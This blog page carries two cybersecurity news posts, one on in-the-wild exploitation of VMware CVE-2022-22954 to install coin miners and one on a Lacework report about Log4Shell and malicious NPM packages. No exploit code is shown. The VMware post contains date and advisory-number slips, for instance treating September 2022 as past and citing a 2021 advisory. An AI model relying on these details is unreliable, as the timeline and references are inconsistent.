Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Software Vendor. Show all posts

Software Vendor VMware Patches Critical Bug Exploited in the Wild

 

Malicious actors are actively exploiting a critical bug, tracked as CVE-2022-22954, in VMware Workspace ONE Access and Identity Manager recently addressed by the vendor. The vulnerability is used in active attacks that infect servers with coin miners. 

Earlier this month, VMWare rolled out an update to resolve a critical security flaw (CVSS: 9.8) in several of their products, including VMware’s Workspace ONE Access, VMware Identity Manager (vIDM), vRealize Lifecycle Manager, vRealize Automation, and VMware Cloud Foundation products.

The software vendor also warned regarding the possibility of an attacker with network access triggering a server-side template injection that results in RCE. The vulnerability is not unprecedented: in late September 2022, CVE-2021-22005 enabled malicious actors to strike vulnerable systems with RCE attacks, achieving root privileges and reaching the vCenter Server over the network. 

“VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.” reads the security advisory. “A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.”

“This critical vulnerability should be patched or mitigated immediately per the instructions in VMSA-2021-0011. The ramifications of this vulnerability are serious,” the software vendor said while urging its customers to address the vulnerabilities immediately to prevent its exploitation. 

In the past two weeks, multiple security researchers designed working exploits for CVE-2022-22954, with at least one proof-of-concept exploit released on Twitter. While publishing public exploits raises the risks that threat actors will use them in attacks, they are also meant to help secure systems through testing and serve as validators of existing fixes/patches. 

According to cybersecurity intelligence firm Bad Packets, malicious actors are actively scanning for vulnerable hosts to exploit the flaw in the wild. The IP address, 106.246.224.219, used in the payload, was recently seen dropping the Linux Tsunami backdoor in other attacks. However, it remains unclear what the 'one' executable is, as it is no longer accessible. Security researcher Daniel Card also joined the queue by releasing proof-of-concept exploits on Twitter and stated that the vulnerability was being exploited to deploy coinminer payloads.

Log4Shell is Employed in 31% of Malware infections, Lacework Labs Identifies

 

In the latest cloud threat report by Lacework, it was disclosed that the infamous Log4Shell vulnerability was exploited as an initial infection vector in 31% of cases identified by Lacework researchers over the past six months. 

The software vendor’s report confirms that the Log4j vulnerability was abused extensively by malicious actors, as cybersecurity researchers had suspected when it emerged in December last year. 

According to Lacework Labs, it initially noticed a flood of requests with malicious payloads immediately after the Log4Shell bug was disclosed, these were the result mainly of researchers searching for the vulnerability. However, these were replaced by malign requests over time, as threat actors adopted publicly available proof-of-concept exploits. 

“Over time, we watched scanning activity evolve into more frequent attacks, including some that deployed crypto-miners and Distributed Denial of Service (DDoS) bots to affected systems,” it explained. In addition to improving their payloads, adversaries continued to adapt their exploitation methods to stay ahead of signature-based detections used by many types of security products.”

In addition to Log4j, multiple threat actors have also employed one backdoor in the ua-parser-js NPM package to secure access to Linux systems and launch the XMRig open-source miner. The original hacking group had managed to exploit the NPM developer’s account to deploy a malicious payload to the package. 

In fact, malicious actors increasingly favor NPM as a vector for attack. A report from Checkmarx this week claimed that attackers have simplified the process of designing new NPM accounts from which to distribute supply chain malware. 

“The attacker has fully automated the process of NPM account creation and has open dedicated accounts, one per package, making his new malicious packages much harder to spot,” it explained. At the time of writing, the threat actor ‘RED-LILI’ is still active at the time of writing and continues to publish malicious packages.” 

The researchers at Lacework Labs also investigated issues around compliance, compromised Docker APIs and malicious containers, and additional bugs within the software supply chain. Based on the findings of this report, researchers advised that defenders should evaluate security infrastructure against the industry's best practices and execute proactive defence and intelligence weapons with active bug monitoring.